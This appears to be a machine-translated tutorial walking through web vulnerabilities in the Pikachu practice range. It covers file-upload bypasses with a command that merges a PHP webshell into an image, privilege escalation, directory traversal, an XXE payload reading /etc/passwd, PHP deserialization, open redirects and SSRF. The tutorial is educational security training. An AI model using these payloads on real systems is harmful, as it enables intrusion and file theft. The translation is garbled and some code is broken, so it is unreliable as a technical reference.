Any file upload is caused by the file format uploaded by the back end to the user, and the lax verification of file content and file permission. It may cause the website of uploading webshell to fall and the website to be hung with black pages.

client check

The upload client verification is generally through JS verification. Using browser plug-ins such as JS toggle to disable JS can bypass the upload limit or delete the code to determine the suffix. The client verification is generally through the suffix name to determine the file format, so you can also change the file name to a legal suffix first, upload the package, and burp modifies the file name before replaying.


Judging the file type by MIME type is usually from http_ The content type field in the header takes the file type. If the value obtained by the server is the legal value specified by the system, this restriction can be bypassed.

In PHP$_ The FILES() function is used to process the client uploading files to the server. It contains

$_FILES['file']['name']  #file name
$_FILES['file']['type']  # file type
$_FILES['file']['size']  # File size in bytes
$_FILES['file']['tmp_name'] # The name of the temporary copy of the file stored on the server
$_FILES['file']['error'] # Error code of file upload

Among them$_ FILES['file']['type'] is to take values from what we said earlier, while the http request content type user is controllable, so it can be bypassed.

For the packet capturing and uploading request, modify the content type field file type to the allowed type.

get_imagesize() validation

This is a function of PHP to determine the size and type of image file. It reads the file in hexadecimal and judges the file type from the first few bits of hexadecimal. For example, if the beginning of the file is 8950 4e47, it is the beginning of PNG format. This beginning is what we generally call the magic number of files. Bypass get_ The imagesize() function can be bypassed by making a picture horse (under windows, you can use the command shape such as copy / b pic.png + shell.php picshell.png To make a picture horse. You can also add a header such as GIF89A directly to the header of the Trojan.

There is a problem at this time. If the uploaded file is a picture, how to execute the inserted malicious code? Directly accessing the file with the suffix of png will return the image. At this time, we can combine the combo boxing contained in the file to analyze the malicious code. After the upload image horse gets the upload location, this part of the vulnerability can be verified in combination with the aforementioned file containing vulnerability.

over permission

If you use the permission of user A to operate the data of user B, the permission of user A is less than the permission of user B. If you can operate successfully, it is called an unauthorized operation. The reason for the ultra vires vulnerability is that the background uses unreasonable permission verification rules. In general, unauthorized vulnerabilities are easy to appear in the places where permission pages (pages to be logged in) are added, deleted, modified and checked. When users perform these operations on the information in permission pages, the background needs to Verify the current user's permission to see if it has the permission to operate, so as to give A response. If the verification rules are too simple, it is easy to have an unauthorized vulnerability.

Therefore, in authority management, we should abide by:
1. Use the principle of minimum authority to empower users;
2. Use reasonable (strict) authority verification rules;
3. Use the background login status as the condition to judge the authority, and don't use the condition passed in from the front end blindly;

Horizontal ultra vires

A and B belong to the same level of users. For example, after a logs in, he can view his own information. He finds that there is a username parameter when submitting the request to view his own information. Modifying the username parameter can view B's personal information, which is the level of ultra vires.

Here, it is observed that when you log in to lucy account to view personal information, the request is as follows:


Change username to kobe


It successfully shows the personal information of kobe, and the level of ultra vires vulnerability verification is successful.

Vertical ultra vires

Vertical ultra vires usually occur when the ordinary user is ultra vires and can operate and manage the employee's authority. The situation here is that administrators can view and add users, and ordinary users can only view users. The verification process is as follows:

  1. Log in the administrator account, add new users, and submit the request to grab the package.
  2. Exit the administrator account and replay the new user request. It is found that the new user cannot be added successfully.
  3. Log in to the ordinary user and find that there is no new user permission, but replace the request cookie part of package grabbing in 1 and replay the new user request
  4. The user is added successfully, and the verification of the vertical ultra vires vulnerability is successful.


The directory traversal vulnerability is also caused by incomplete restrictions on the user's request for input data. For example /In linux, it means directory backtracking, which exceeds the number of directories /Eventually, it goes back to the root. We can construct the path.. /.. /.. /.. / etc/passwd to access files such as / etc/passwd.

Normal request


Replace the filename parameter in the title.


Unexpected file read succeeded.

Leakage of sensitive information

Sensitive information disclosure means that people put the information that should not be disclosed into the open information base. Cause the leakage of sensitive information. As long as the information can be seen by hackers and helpful for hackers' invasion, it can be classified as sensitive information.

For example, you can see the annotated test user name and password in the source code of the login page, lili/123456. The obvious pw field of the cookie field after lili login is weak encryption. Deleting the file name on the url path can see the file and middleware information under the same level directory, which belong to sensitive information disclosure.

PHP deserialization

php serialization is to turn an object into a string that can be transmitted, and deserialization is to convert the transmitted string into an object. The Functions php implements serialization and deserialization are serialize(), unserialize(). Refer to the example of serialization and deserialization in pikachu range:

class S{
	public $test="pikachu";
$s = new S(); //Create a new object
serialize($s); //Serialized object s

After serializing this object, you get o: 1: 's': 1: {s: 4:' test '; s: 7:' Pikachu ';}
O-----On behalf of object
1-----Object name length
S-----Object name
1---------Object has a variable in it
s--------string data type
4-------Data variable name length
test------Variable name
s-------data type
7-------Variable value length
pikachu------Variable value


// Deserialization
$u = unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
echo $u->test; //Get the value of test as pikachu

// If the content of deserialization can be controlled by users, and the magic functions in php are not used correctly in the background, security problems will occur. Common magic functions are
__construct()  //Use when creating objects
__destruct()   // Use when destroying objects
__toString()   // Object as a string
__sleep()   //Run before object serialization
__wakeup() // Called immediately after serialization
// Examples of vulnerabilities
class S{
            var $test = "pikachu";
            function __destruct(){
                echo $this->test;
        $s = $_GET['test'];
        @$unser = unserialize($a);


The function here is to input a serialized data. The source audit page is to execute echo when creating S object based on the serialized data and return the value of test variable in the object. If the structure is normal, such as


pikachu will be returned after submission, but if the payload s of the submitted construction are as follows


When S executes the destruct method, it will echo the JS script and implement xss in the front end.

It is difficult to find serialization vulnerability through black box test. In general, the main way to find deserialization vulnerability is through source audit.


XXE is also known as XML external entity injection attack. XML is designed to transfer and store data. It mainly consists of three parts. What is XML for reference xml tutorial

<!-- xml statement-->
<?xml version="1.0" encoding="UTF-8"?>

<!-- Document type definition DTD: xxe What went wrong-->
<!-- 1.DTD Internal reference-->
<!DOCTYPE  Root element [Element description]>
<!-- 2.DTD External references-->
<!DOCTYPE Root element name SYSTEM "external DTD Of URI">
<!-- 3.Reference public DTD-->
<!DOCTYPE Root element name PUBLIC "DTD Tagnames" "public DTD Of URI">

<!-- Document elements: the real data part-->
  <body>Don't forget me this weekend!</body>

Combined with the source code audit in the shooting range, the meaning here is to read the XML document data and output it in the < pre > tag. If you can't read the XML or the XML format you read is wrong, you will return "XML declaration, DTD document type definition, document element are all understood?".

Refer to the external entity structure to read the payload of / etc/passwd

<?xml version="1.0"?>
	<!ENTITY f SYSTEM "file:///etc/passwd">

Simplexml in php_ load_ String () is used to convert xml documents into simplexmlement objects. Libxml is used to parse xml in php, and libxml is forbidden to parse the external entity content of xml by default after version 2.9.0, so there will be no xxe vulnerability in later versions by default.

Unsafe url jump

The problem of unsafe url jump may happen where url address jump is executed.
If the back-end uses the parameters passed in from the front-end (maybe the user's parameters, or the url address embedded in the front-end page before) as the jump destination, and does not make a judgment, the problem of "jump wrong object" may occur.

The direct harm of url jump is: phishing, in which the attacker uses the domain name of the vulnerable party (for example, a well-known company's domain name often makes the user feel relieved to click) to cover up, and the final jump is indeed a phishing website

Here's a hyperlink to the url for teenagers like the wind of autumn


After clicking this link, you will jump to unsafere.php page

But if you modify the url parameter, construct the url


Visit the above link to jump to Baidu. General users look at the domain name first. They may think they are visiting xxx website, but any url jump here has redirected users to other phishing pages.


Server request forgery usually occurs when server A has the function of obtaining data from server B, but server A has no restriction on the request target. In this way, the attacker can use server A to access server B or other machines in the same intranet as server A. Usually, this vulnerability is used for intranet information collection.

PHP Improper use of the following functions in can cause SSRF:


From the source code, you can see that this part of the function here is through curl_ The exec() function executes the url to pass the address given by the parameter, and then returns the parameter to the front end. If the url parameter is replaced with http://xxxx Or other protocols supported by curl will be executed by curl (curl supports telnet ftp ftps dict file ldap, etc.)



file_ get_ The content() function is the preferred method for reading the contents of a file into a string, with the same logic as before. It supports reading remote files or local files, as well as multiple protocols. More importantly, it also supports php pseudo protocol. We can use the pseudo protocol method to read the local source code


Topics: PHP Database SQL xml